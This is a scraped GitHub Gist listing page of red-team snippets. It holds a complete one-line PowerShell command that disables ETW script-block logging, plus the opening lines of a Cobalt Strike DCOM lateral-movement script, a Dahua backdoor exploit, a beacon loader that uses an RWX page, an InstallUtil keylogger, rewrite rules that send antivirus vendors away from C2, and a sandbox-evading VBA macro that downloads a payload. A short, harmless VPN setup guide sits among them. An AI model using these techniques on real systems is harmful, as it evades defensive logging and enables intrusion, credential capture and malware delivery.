Skip to content

Instantly share code, notes, and snippets.

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{
@vysecurity
vysecurity / KillETW.ps1
Created June 10, 2018 12:47 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
# Lateral movement techniques based on research by enigma0x3 (Matt Nelson)
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
# Beacon implementation based on comexec.cna by Raphael Mudge
# https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2
# Register alias
beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)",
"Usage: dcom_shellexecute [target] [listener]\n\n" .
"Spawn new Beacon on a target via DCOM ShellExecute Object.");
@vysecurity
vysecurity / CredentialUI.cs
Created May 2, 2018 16:04 — forked from mayuki/CredentialUI.cs
Windows Common Credential UI Helper for .NET Framework
/*
* CredentialUI.cs - Windows Credential UI Helper
*
* License: Public Domain
*
*/
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Security;
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
#Jacked from git history
#
import string
#include "stdafx.h"
// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {
HANDLE threadHandle;
DWORD threadId = 0;
char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(alloc, payload, len);
@vysecurity
vysecurity / InstallUtilMouseKeyLogger.cs
Created February 27, 2018 16:12
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
@vysecurity
vysecurity / gist:8dfb791c8fca952729e4f4f80b1ce1f4
Created November 16, 2017 23:31 — forked from aioutecism/gist:2638bb9eaf9ffc13348c
Set up a VPN Server (PPTP) on AWS and use it anywhere

Set up a VPN Server (PPTP) on AWS

  1. Create a EC2 instance using Ubuntu 14.04.
  2. In Secure Group Inbound Rules, add a SSH Rule(TCP, Port 22, 0.0.0.0/0) and a Custom TCP Rule(TCP, Port 1723, 0.0.0.0/0).
  3. Optional: Associate a Elastic IP with the instance.
  4. SSH into the instance.
  5. sudo apt-get install pptpd.
  6. sudo vim /etc/pptpd.conf. Uncomment localip 192.168.0.1 and remoteip 192.168.0.234-238,192.168.0.245.
  7. sudo vim /etc/ppp/pptpd-options. Uncomment ms-dns and ms-wins. Change the IP to Google's DNS like this:
RewriteEngine On
#LogLevel alert rewrite:trace5
# BURN AV BURN
# TrendMicro
RewriteCond expr "-R '150.70.0.0/22'" [OR]
RewriteCond expr "-R '150.70.104.0/22'" [OR]
RewriteCond expr "-R '150.70.110.0/24'" [OR]
RewriteCond expr "-R '150.70.112.0/20'" [OR]
' Author Arno0x0x - https://twitter.com/Arno0x0x
'
' This macro downloads an XML bibliography source file.
' The <Title> element of this XML file actually contains a base64 encoded MSOffice template
' which itself contains another malicious macro much more detectable (meterpreter for instance).
'
' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder
' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it.
'
' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers